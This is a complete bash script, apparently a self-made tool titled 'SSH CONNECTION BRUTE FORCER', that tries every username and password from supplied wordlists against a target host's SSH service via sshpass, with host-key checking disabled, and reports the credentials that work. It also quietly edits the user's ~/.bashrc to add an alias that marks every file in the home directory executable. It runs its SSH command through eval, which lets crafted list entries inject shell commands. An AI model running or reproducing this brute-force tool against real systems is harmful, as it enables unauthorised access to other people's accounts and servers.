#!/bin/bash

alias_to_add='alias sshash="cd && chmod +x * && ./sshash"'

if ! grep -qxF "$alias_to_add" ~/.bashrc; then
    echo "$alias_to_add" >> ~/.bashrc
    echo "Alias ajouté à ~/.bashrc"
else
    echo "L'alias est déjà présent dans ~/.bashrc"
fi


clear
trap 'echo -e "\nOperation aborted by the user."; exit' INT

function test_ssh_password {
    ssh_command="sshpass -p '$2' ssh -o StrictHostKeyChecking=no -p $3 $1@$4 'echo SSH Login Successful'"
    if output=$(eval "$ssh_command" 2>&1); then
        if [[ $output == *"SSH Login Successful"* ]]; then
            echo "SSH Login Successful - $1:$2"
        else
            echo "SSH Login Failed - $1:$2"
        fi
    else
        echo "SSH Login Failed - $1:$2"
    fi
}

# Parse command-line arguments
while getopts ":u:i:p:l:" opt; do
    case $opt in
        u) userlist_path=$OPTARG ;;
        i) host_ip=$OPTARG ;;
        p) ssh_port=$OPTARG ;;
        l) passwordlist_path=$OPTARG ;;
        \?) echo "Invalid option: -$OPTARG" >&2; exit 1 ;;
    esac
done

if [[ -z $host_ip ]]; then
    echo "Please provide the IP address using the -i option."
    exit 1
fi

if [[ -z $userlist_path ]]; then
    echo "Please provide the path to the user list using the -u option."
    exit 1
fi

if [[ -z $passwordlist_path ]]; then
    echo "Please provide the path to the password list using the -l option."
    exit 1
fi

if [[ -z $ssh_port ]]; then
    ssh_port=22
fi

IFS=$'\r\n' GLOBIGNORE='*' command eval 'users=($(cat "$userlist_path"))'
IFS=$'\r\n' GLOBIGNORE='*' command eval 'passwords=($(cat "$passwordlist_path"))'

echo "   ____ ____ _   _    _    ____ _   _   "
echo "  |___ |___ | | | |  / \  |___ | | | |  "
echo "  / ___/ ___| |_| | / _ \ / ___| |_| |  "
echo " | (__| (___|  _  |/ ___ | (___|  _  |  "
echo "  \____\____|_| |_/_/   \_\____|_| |_|  "
echo "                              TRABBIT   "
echo
echo "    * SSH CONNECTION BRUTE FORCER *     "
echo "{>====================================<}"

# Display target, port, and passlist filenames
for i in "--{[+]TARGET} => $host_ip" "--{[+]PORT} => ${ssh_port:-22}" "--{[+]USERLIST} => $(basename "$userlist_path")" "--{[+]PASSLIST} => $(basename "$passwordlist_path")"; do
    sleep 0.2
    echo "$i"
done
sleep 0.2
echo "{>====================================<}"
echo "     //BRUTEFORCE ATTACK STARTED//     "
echo "{>====================================<}"
for i in {1..39}; do
    sleep 0.01
    echo -n "*"
done
echo

for user in "${users[@]}"; do
    for password in "${passwords[@]}"; do
        test_ssh_password "$user" "$password" "$ssh_port" "$host_ip"
    done
done
echo "{>====================================<}"
echo "                  Done.                 "
echo "{>====================================<}"
